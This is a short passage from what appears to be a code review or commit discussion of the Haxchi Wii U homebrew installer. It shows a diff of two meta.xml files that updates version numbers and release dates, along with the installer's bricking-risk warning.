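`LAUNCH_HBL` path; if the loader at 0x01800000 reads that path from another core or from IOSU, the store is still needed there too.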
diff --git a/release/wiiu/apps/cbhc/meta.xml b/release/wiiu/apps/cbhc/meta.xml index 61ec169..4a55413 100644 --- a/release/wiiu/apps/cbhc/meta.xml +++ b/release/wiiu/apps/cbhc/meta.xml @@ -2,9 +2,9 @@ CBHC FIX94 - 1.4 + 1.4u1 https://github.com/FIX94/haxchi - 20161216200000 + 20161219200000 Coldboot Haxchi Installer WARNING! This will install Coldboot Haxchi on your system. ONLY USE THIS IF YOU ARE WILLING TO TAKE A RISK OF BRICKING YOUR CONSOLE. diff --git a/release/wiiu/apps/haxchi/meta.xml b/release/wiiu/apps/haxchi/meta.xml index 6c44504..9fbc725 100644 --- a/release/wiiu/apps/haxchi/meta.xml +++ b/release/wiiu/apps/haxchi/meta.xml @@ -2,9 +2,9 @@ Haxchi FIX94 - 2.3u1 + 2.4 https://github.com/FIX94/haxchi - 20161213200000 + 20161219200000 Haxchi Installer This will install Haxchi on your system.
